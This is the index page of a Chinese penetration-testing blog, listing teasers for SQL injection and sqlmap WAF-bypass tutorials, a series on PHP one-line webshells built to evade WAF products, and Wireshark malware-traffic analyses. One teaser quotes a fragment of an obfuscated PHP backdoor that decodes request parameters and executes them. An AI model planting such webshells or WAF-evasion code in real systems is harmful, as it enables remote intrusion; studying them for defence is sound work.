漏洞人生
生存之道,安全之法,产品之术,代码之器
首页
WEB开发
Python
PHP
服务器
discuz
wordpress
在线工具
网络安全
渗透教程
渗透工具
互联网
产品/运营
SEO优化
SEO常识
SEO教程大全
网络运维
乌云drops
乌云zone
It’s Life
资源下载
行业标准
关于博主
给我留言
首页
菜单
SEO教程大全
网络运维
网络安全
网站建设
这就是生活
有问必答
关于我
首页
>
渗透教程
渗透教程
可能是网上最易懂的SQL手工注入教程【个人笔记精华整理】
2018-5-19
sqlmap
,
sql注入
,
渗透教程
111256
0
我是技术不高,但我能带你入门 我遇到过无数人曾来像我表示自己想学网络安全,走了很多弯路,求师被骗过很多钱。 这样的人我没办法帮助太多,限于时间精力与能力,帮得了1个帮不了100个,再说我也不是昔日的雷锋了。 如今我也基本上不做渗透了,回过头看到几年前自己笔记中有一些注入…
继续阅读 »
渗透教程
php一句话后门过狗姿势万千之后门构造与隐藏【二】
2016-11-20
PHP
,
后门
14159
0
声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 上一篇:php一句话后门过狗姿势万千之理论篇【一】 第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制。 另外强调一下,这篇文章需…
继续阅读 »
渗透教程
php一句话后门过狗姿势万千之传输层加工【三】
2016-11-20
PHP
,
后门
11700
0
声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/442.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com 既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回…
继续阅读 »
渗透教程
php一句话后门过狗姿势万千之理论篇【一】
2016-11-18
PHP
,
后门
11615
0
声明: 本文由博主首发于:阿里先知 https://xianzhi.aliyun.com/forum/read/441.html 如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面。 但是我只能说,我…
继续阅读 »
渗透工具
渗透教程
php一句话后门过5大WAF无压力[安全狗+360网站卫士+护卫神+D盾]
2016-11-12
PHP
,
后门
49229
0
最近研究过狗一句话有点走火入魔,目前研究了几个版本的一句话,效果都还不错。 授之于鱼不如授之以渔,过几天准备从理论层,代码层,传输层写个过狗连载教程。 目前我使用的是cknife软件,类似于菜刀的开源软件,虽然还有不少bug,但高度自由修改,不用担心后门。我之所以没有用菜刀,…
继续阅读 »
渗透教程
php一句话后门的几种变形分析[preg_replace函数]
2016-11-8
PHP
,
后门
36413
0
今天偶然在土司看到一篇关于php后门的问题,让我联想到以前遇到过的一个一句话,共同点都是利用preg_replace中/e 修正符使replacement 参数当作 PHP 代码来执行。 先来看下原版代码 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…
继续阅读 »
渗透教程
教你如何获取360网站安全检测扫描官方御用字典
2016-10-17
小技巧
,
渗透神器
14426
0
这是我之前发表在土司的一篇文章,在这里也分享给大家 360是个恶心的东西大家都懂的,但是有的时候我们可以小小的利用下。先上个图: 360网站在线扫描是可以扫描任意网站的,什么意思呢?我可以直接输入别人的网址,360会直接进行扫描,但是如果想看到扫描报告,那就得验证站长权限了。 …
继续阅读 »
渗透教程
WireShark教程 – 黑客发现之旅(3) – Bodisparking恶意代码[转]
2015-10-13
wireshark
,
抓包
12537
0
0x00 发现 接到客户需求,对其互联网办公区域主机安全分析。在对某一台主机通信数据进行分析时,过滤了一下HTTP协议。 一看数据,就发现异常,这台主机HTTP数据不多,但大量HTTP请求均为“Get heikewww/www.txt”,问题的发现当然不是因为拼音“heike”。点击“Info”排列一下,可以看得更清楚,还…
继续阅读 »
渗透教程
WireShark教程 – 黑客发现之旅(2)—肉鸡邮件服务器[转]
2015-10-13
wireshark
,
抓包
14803
0
0x00 背景 肉鸡也称傀儡机,是指可以被黑客远程控制的机器。一旦成为肉鸡,就可以被攻击者随意利用,如:窃取资料、再次发起攻击、破坏等等。下面将利用WireShark一起学习一种肉鸡的用途:广告垃圾邮件发送站。 0x01 发现问题 在对某企业服务器群进行安全检测时发现客户一台服务器(10.19…
继续阅读 »
渗透教程
sqlmap注入之tamper绕过WAF防火墙过滤
2015-9-14
sqlmap
,
sql注入
,
WAF
66633
0
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。 但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前…
继续阅读 »
1
2
下一页
末页
生活累,一小半源于生存,一大半源于攀比。
与我联系:
戳这里>>
搜索
热评文章
随机文章
最近更新
最新文章
2016-10-5
BurpSuite 1.7.11破解版下载【附多/新版本下载】
2016-11-5
Connectify Dispatch指定程序使用指定网卡[运维神器]
2014-3-25
网站备案流程_网站备案需要什么[简单明了解决备案各种问题]
2018-2-3
最新BurpSuite 1.7.32 破解版[注册机]下载【无后门版】
2016-11-8
php一句话后门的几种变形分析[preg_replace函数]
2016-10-24
通过QEMU 和 IDA Pro远程调试设备固件 - cssembly
2016-11-1
大家好- -我是这个领域的领主、是否可以发布外挂呢。。
2016-10-24
小白欢乐多——记ssctf的几道题目 - louys
2016-10-24
Clickjacking简单介绍 - 瞌睡龙
2016-10-24
编写基于PHP扩展库的后门 - lxj616
2023-2-10
[网盘下载] GB/T 23031. 1 — 2022 工业互联网平台 应用实施指南 第一部分:总则.pdf
2023-2-7
[网盘下载] GB/T 41870-2022 工业互联网平台 企业应用水平与绩效评价.pdf
2023-2-3
[网盘下载] GB/T 36323-2018 信息安全技术 工业控制系统安全管理基本要求.pdf
2023-2-3
[网盘下载] GB/T 32919 -2016 信息安全技术 工业控制系统安全控制应用指南.pdf
2023-2-2
GB/T 36466-2018 信息安全技术 工业控制系统风险评估实施指南.pdf
2023-2-10
[网盘下载] GB/T 23031. 1 — 2022 工业互联网平台 应用实施指南 第一部分:总则.pdf
2023-2-7
[网盘下载] GB/T 41870-2022 工业互联网平台 企业应用水平与绩效评价.pdf
2023-2-3
[网盘下载] GB/T 36323-2018 信息安全技术 工业控制系统安全管理基本要求.pdf
2023-2-3
[网盘下载] GB/T 32919 -2016 信息安全技术 工业控制系统安全控制应用指南.pdf
2023-2-2
GB/T 36466-2018 信息安全技术 工业控制系统风险评估实施指南.pdf
最新评论
陆
邀请码
test
那个配置文件的路径在哪里啊
小山
支持
Big Tree
我和你一样的反应
8848
666
热门标签
服务器
标准规范
百度算法
互联网
优秀工具
合肥seo
外链
百度权重
网络营销
discuz
百度排名
搜索引擎
生活如此多娇
python模块
渗透神器
PHP
wordpress
关键词
百度站长平台
linux工具
网站运营
用户体验
网站结构
linux
后门
网站收录
域名
sql注入
抓包
wireshark
运维工具
用户需求
友情链接
云悉指纹
最新评论
陆邀请码
test那个配置文件的路径在哪里啊
小山支持
Big Tree我和你一样的反应
8848666